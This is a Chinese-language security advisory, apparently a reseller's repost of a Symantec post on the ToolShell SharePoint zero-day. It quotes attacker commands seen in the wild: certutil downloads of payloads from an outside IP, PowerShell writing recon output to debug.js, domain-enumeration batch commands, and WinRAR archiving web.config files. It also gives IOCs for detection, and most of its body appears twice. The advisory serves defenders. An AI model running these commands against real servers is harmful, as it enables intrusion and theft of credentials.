ToolShell 零日漏洞現身：攻擊者可遠端掌控 SharePoint 伺服器

Symantec Threat Hunter
7月22日
讀畢需時 3 分鐘

已更新：7月28日

關鍵摘要：

漏洞名稱：ToolShell（CVE-2025-53770）
影響平台：SharePoint Server 2016（未修補）、2019、Subscription Edition（已修補）
危害描述：未經驗證的遠端攻擊者可取得伺服器完整控制權，執行任意程式、存取檔案系統。
漏洞源頭：為 2025 年 7 月剛修補的 CVE-2025-49704 變種
攻擊活動：已在全球實際觀察到惡意攻擊行為，包含植入惡意 PowerShell、遠端下載、橫向擴散、打包 exfiltration 等完整鏈條。
工具與手法：使用 certutil、PowerShell、WinRAR（改名為 backup.exe）等工具竊取與打包伺服器資訊，攻擊技巧老練。

Symantec 產品已可封鎖 CVE-2025-53770 漏洞攻擊行為

2025 年 7 月 22 日 13:23 UTC 更新：已補充漏洞攻擊活動的資料。
2025 年 7 月 22 日 12:37 UTC 更新：已新增更多有關後續攻擊行為的細節。
2025 年 7 月 21 日 10:40 UTC 更新：已新增更多指標（IOC）。

防護措施

Symantec 產品已透過以下網路防護技術封鎖此漏洞的攻擊行為：

Web Attack: Microsoft SharePoint CVE-2025-49704

另一個相關漏洞（CVE-2025-53771）也已獲得修補。此為一個路徑穿越漏洞，允許授權攻擊者在網路中進行冒充攻擊。這同樣是 2025 年 7 月修補漏洞 CVE-2025-49706 的變種，而本次修補更增強了對該舊漏洞的防護。

後續攻擊活動

在部分發生後續攻擊的網路中，攻擊者首先執行了一段編碼過的 PowerShell 指令，接著使用 certutil 下載名為 client.exe 的檔案（SHA256：fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274）自 134.199.202[.]205，並將其儲存為 debug.js：

powershell -Command "certutil -urlcache -split -f http://134.199.202.205/client.exe C:\Windows\Temp\client.exe >'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js'"

接著使用 PowerShell 以 –value 參數傳遞命令，如：

powershell -Command "Set-Content -Path 'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js' -Value (whoami)" powershell -Command "Set-Content -Path 'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js' -Value (tasklist /svc)"

debug.js 的命名可能是為了讓檔案看起來無害。此檔案之後執行了位於 c:\temp\test.bat 的批次檔，內容如下：

/c query user > query_user.txt && tasklist /svc > tasklist_info.txt && ipconfig /all > ipconfig_all.txt && net user > net_user.txt && net user /domain > net_user_domain.txt && net accounts /domain > net_accounts_domain.txt && net group /domain > net_group_domain.txt && net group Domain Admins /domain > net_group_Domain_Admins_domain.txt && net group Domain Controllers /domain > net_group_Domain_Controllers_domain.txt && net group Domain Computers /domain > net_group_Domain_Computers_domain.txt && nltest /domain_trusts > domain_trusts.txt && net view > net_view.txt && net start > net_start.txt && systeminfo > systeminfo.txt && arp -a > arp_a.txt

執行的檔案還包括：

powershell.exe
tasklist.exe
ipconfig.exe
net.exe
nltest.exe
systeminfo.exe
backup.exe
arp.exe

其中，backup.exe 是改名後的 WinRAR，被用來竊取機密資訊，如：

/c backup.exe a -r -y logs.rar C:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\**\\web.config /c backup.exe a -r -y -df log.rar c:\\*.txt C:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\**\\web.config

此外，也使用 certutil 下載名為 agent.x64.exe 的檔案（SHA256：04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6），用來啟動 project1.exe（SHA256：430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d）：

certutil -urlcache -split -f http://134.199.202.205/agent.x64.exe C:\Users\Public\agent.x64.exe

🛡️ 防護現況與建議行動：

✅ 已防護產品：

Symantec Endpoint Security (SES) 及 Network Protection 已可攔截 CVE-2025-49704 相關變種攻擊（亦即 ToolShell）
防護名稱：Web Attack: Microsoft SharePoint CVE-2025-49704

📌 建議行動清單（給 IT / 資安人員）：

立即更新 SharePoint 至最新版，尤其是尚未修補的 2016 版本使用者需特別注意。
封鎖與監控下列可疑 IP：
- 107.191.58[.]76、104.238.159[.]149、96.9.125[.]147 等
- 總共列出 20+ 攻擊與掃描來源 IP（完整清單見原文）
掃描與分析 POST 請求中是否含有可疑路徑：
- /layouts/15/ToolPane.aspx?DisplayMode=Edit
搜尋指令紀錄與惡意檔案路徑：
- 如：debug.js, client.exe, agent.x64.exe, project1.exe
查看是否有以下 SHA256 檔案出現（IOC）：
- fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274
- 04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6
- 430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d

📞 想知道自己是否在名單上？現在就與我們聯絡

ToolShell 的攻擊已經在實際環境中活躍進行。若您尚未確認環境是否暴露，或需要進一步防護建議、IOC 偵測工具、弱點掃描服務，請立即與 Symantec 亞洲區代理商 Westcon 台灣團隊聯繫，獲得專業技術支援。

原文出處 Symatnec Enterprise Blogs

https://www.security.com/threat-intelligence/toolshell-zero-day-sharepoint-cve-2025-53770

關鍵摘要：

漏洞名稱：ToolShell（CVE-2025-53770）

影響平台：SharePoint Server 2016（未修補）、2019、Subscription Edition（已修補）

危害描述：未經驗證的遠端攻擊者可取得伺服器完整控制權，執行任意程式、存取檔案系統。

漏洞源頭：為 2025 年 7 月剛修補的 CVE-2025-49704 變種

攻擊活動：已在全球實際觀察到惡意攻擊行為，包含植入惡意 PowerShell、遠端下載、橫向擴散、打包 exfiltration 等完整鏈條。

工具與手法：使用 certutil、PowerShell、WinRAR（改名為 backup.exe）等工具竊取與打包伺服器資訊，攻擊技巧老練。

Symantec 產品已可封鎖 CVE-2025-53770 漏洞攻擊行為

2025 年 7 月 22 日 13:23 UTC 更新：已補充漏洞攻擊活動的資料。

2025 年 7 月 22 日 12:37 UTC 更新：已新增更多有關後續攻擊行為的細節。

2025 年 7 月 21 日 10:40 UTC 更新：已新增更多指標（IOC）。

防護措施

Symantec 產品已透過以下網路防護技術封鎖此漏洞的攻擊行為：

Web Attack: Microsoft SharePoint CVE-2025-49704

相關漏洞

另一個相關漏洞（CVE-2025-53771）也已獲得修補。此為一個路徑穿越漏洞，允許授權攻擊者在網路中進行冒充攻擊。這同樣是 2025 年 7 月修補漏洞 CVE-2025-49706 的變種，而本次修補更增強了對該舊漏洞的防護。

後續攻擊活動

在部分發生後續攻擊的網路中，攻擊者首先執行了一段編碼過的 PowerShell 指令，接著使用 certutil 下載名為 client.exe 的檔案（SHA256：fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274）自 134.199.202[.]205，並將其儲存為 debug.js：

接著使用 PowerShell 以 –value 參數傳遞命令，如：

debug.js 的命名可能是為了讓檔案看起來無害。此檔案之後執行了位於 c:\temp\test.bat 的批次檔，內容如下：

執行的檔案還包括：

powershell.exe

tasklist.exe

ipconfig.exe

net.exe

nltest.exe

systeminfo.exe

backup.exe

arp.exe

其中，backup.exe 是改名後的 WinRAR，被用來竊取機密資訊，如：

此外，也使用 certutil 下載名為 agent.x64.exe 的檔案（SHA256：04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6），用來啟動 project1.exe（SHA256：430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d）：

🛡️ 防護現況與建議行動：

✅ 已防護產品：

Symantec Endpoint Security (SES) 及 Network Protection 已可攔截 CVE-2025-49704 相關變種攻擊（亦即 ToolShell）

防護名稱：Web Attack: Microsoft SharePoint CVE-2025-49704

📌 建議行動清單（給 IT / 資安人員）：

立即更新 SharePoint 至最新版，尤其是尚未修補的 2016 版本使用者需特別注意。

封鎖與監控下列可疑 IP：

107.191.58[.]76、104.238.159[.]149、96.9.125[.]147 等

總共列出 20+ 攻擊與掃描來源 IP（完整清單見原文）

掃描與分析 POST 請求中是否含有可疑路徑：

/layouts/15/ToolPane.aspx?DisplayMode=Edit

搜尋指令紀錄與惡意檔案路徑：

如：debug.js, client.exe, agent.x64.exe, project1.exe

查看是否有以下 SHA256 檔案出現（IOC）：

fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274

04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6

430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d

📞 想知道自己是否在名單上？現在就與我們聯絡

ToolShell 的攻擊已經在實際環境中活躍進行。若您尚未確認環境是否暴露，或需要進一步防護建議、IOC 偵測工具、弱點掃描服務，請立即與 Symantec 亞洲區代理商 Westcon 台灣團隊聯繫，獲得專業技術支援。

留言